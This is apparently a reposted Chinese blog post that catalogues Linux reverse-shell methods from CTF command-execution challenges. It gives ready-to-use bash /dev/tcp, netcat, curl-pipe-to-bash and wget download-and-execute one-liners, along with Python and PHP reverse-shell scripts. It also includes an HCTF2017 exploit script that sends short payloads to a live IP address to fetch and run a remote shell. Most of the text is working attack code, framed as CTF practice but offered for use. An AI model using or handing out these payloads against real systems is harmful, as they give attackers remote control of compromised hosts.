Linux下几种常见的反弹shell方式
最近在做ctf题时碰到一些命令执行题借用命令执行来反弹shell,这里记录一下。1.bash反弹shell
个人感觉bash反弹是最简朴、也是最常见的一种。
bash -i >& /dev/tcp/192.168.20.151/8080 0>&1
bash一句话命令详解
以下针对常用的bash反弹一句话进行了拆分分析,具体内容如下。
https://i-blog.csdnimg.cn/direct/c69f058343124514877149bd6969a294.png
其实以上bash反弹一句完整的解读过程就是:
bash产生了一个交互情况与本田主机主动发起与目标主机8080端口建立的毗连(即TCP 8080 会话毗连)相结合,然后在重定向个tcp 8080会话毗连,最后将用户键盘输入与用户标准输出相结合再次重定向给一个标准的输出,即得到一个bash 反弹情况。
在反弹shell时要借助netcat工具反弹
Netcat 一句话反弹:Netcat反弹也是非常常用的方法,只是这个方法需要我们手动去安装一个NC情况
开启外网主机监听
root@kali:~# nc -lvvp 8080
listening on 8080 ...
kali : 192.168.20.151
centos:192.168.20.130
先用kali开启监听:
然后centos执行bash一句话。
https://i-blog.csdnimg.cn/direct/7cfc81c420174002a754e929ebe46b2b.png
https://i-blog.csdnimg.cn/direct/5127963db9e04953874b0ee7a270a831.png
成功反弹。
2.netcat 一句话反弹
~nc 192.168.31.151 7777 -t/bin/bash
命令详解:通过webshell我们可以使用nc命令直接建立一个tcp 8080 的会话连接,然后将本地的bash通过这个会话连接反弹给目标主机(192.168.31.151)。
先开启监听7777端口。
https://i-blog.csdnimg.cn/direct/135feb07e67b4b1498a3f6ba2c4d8e55.png
https://i-blog.csdnimg.cn/direct/14bb6a575e5e434e8c0aae8f14c328a1.png
https://i-blog.csdnimg.cn/direct/17806bcf6e5c4b0cae0a0babd2d9c34b.png
交互式反弹
3.curl反弹shell
前提要利用bash一句话的情况下利用curl反弹shell
在存在命令执行的服务器上执行curl ip|bash,该ip的index文件上含有bash一句话,就可以反弹shell。
例如在本身的服务器index上写上一句话
bash -i >& /dev/tcp/192.168.20.151/7777 0>&1
192.168.20.151就是作为监听端口的服务器用来得到反弹的shell。
https://i-blog.csdnimg.cn/direct/c1d89d1d6d1b4a6e80f39b1f2e0dc896.png
存在一句话,利用curl反弹。
kali开启监听
https://i-blog.csdnimg.cn/direct/310f1b51694647219de0c79831326a73.png
https://i-blog.csdnimg.cn/direct/836c2a035c5c470ba0daf734035f3dd6.png
4.wget方式反弹
利用wget进行下载执行
wget 192.168.20.130/shell.txt -O /tmp/x.php && php /tmp/x.php
利用下面贴出的php进行反弹。
开启监听
https://i-blog.csdnimg.cn/direct/d783d280ee19415ca2bf05229e63be7b.png
https://i-blog.csdnimg.cn/direct/a65e9c613bd1485682c0f8a69317e2de.png
成功反弹shell
5.其他脚本反弹
python反弹
开启kail监听
https://i-blog.csdnimg.cn/direct/daad4ffe1ead44288265960d8ac65ec0.png
https://i-blog.csdnimg.cn/direct/c52483cb4f6c428494ef017f35784ab3.png
反弹成功。
py脚本
#!/usr/bin/python
#-*- coding: utf-8 -*-
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.20.151",7777)) #更改localhost为自己的外网ip,端口任意
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
php反弹
开启kail监听端口,
https://i-blog.csdnimg.cn/direct/22dd4b551a974855a393f3057a8cf9b9.png
https://i-blog.csdnimg.cn/direct/6bfd02b6055349bdba929365c85dce37.png
成功反弹,不过这里要将php生存成txt文件进行反弹,若为php文件不会反弹成功。
php脚本:
<?php
$sock=fsockopen("192.168.20.151",7777);//localhost为自己的外网ip,端口任意
exec("/bin/sh -i <&3 >&3 2>&3");
?>
ctf遇到的命令执行反弹shell
HCTF2017的一道
https://i-blog.csdnimg.cn/direct/2cddd771ad2e4bde998f0f3533adb388.png
这道题大概意思就是存在命令执行,但单次输入字符不得大于5。因此利用linux下特有的命令来写入shell反弹。原理就是利用curl ip|bash等许多方式去反弹shell。网上许多教程具体就不说了。
import requests
from time import sleep
from urllib.parse import quote
payload = [
# generate `ls -t>g` file
'>ls\\',
'ls>_',
'>\ \\',
'>-t\\',
'>\>g',
'ls>>_',
# generate `curl orange.tw.tw|python`
# generate `curl 10.188.2.20|bash`
'>sh\ ',
'>ba\\',
'>\|\\',
# '>03\\',
# '>90\\',
'>0\\',
'>20\\',
'>1.\\',
'>12\\' ,
'>7.\\',
'>10\\' ,
'>9.\\',
'>3\\',
'>\ \\',
'>rl\\',
'>cu\\',
#exec
'sh _',
'sh g',
]
r = requests.get('http://120.79.33.253:9003/?reset=1')
for i in payload:
assert len(i) <= 5
r = requests.get('http://120.79.33.253:9003/?cmd=' + quote(i) )
print (i)
sleep(0.2)
在本身服务器中放入bash一句话,利用curl ip|bash反弹shell
开启监听,执行后可反弹shell。
https://i-blog.csdnimg.cn/direct/f6b623e376cf4f0fb2770f6d64984318.png
利用linux文件写入本领得到
https://i-blog.csdnimg.cn/direct/20986cd9684e41fd910139c1955369be.png
ls -t >g是倒序输出文件名字,然后sh _执行此文件,写入到g中
https://i-blog.csdnimg.cn/direct/7a82463c15d04aee95c0208e647f5da3.png
可以看到该文件有curl xx.x.x.x|bash字符,在linux下输入任意一个字符后加\是不会中断当前操纵,可以继续输入内容。而后面没有\则会中断,而sh可以在报错的情况下依然会执行可以执行的命令,因此不会影响curl的执行。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]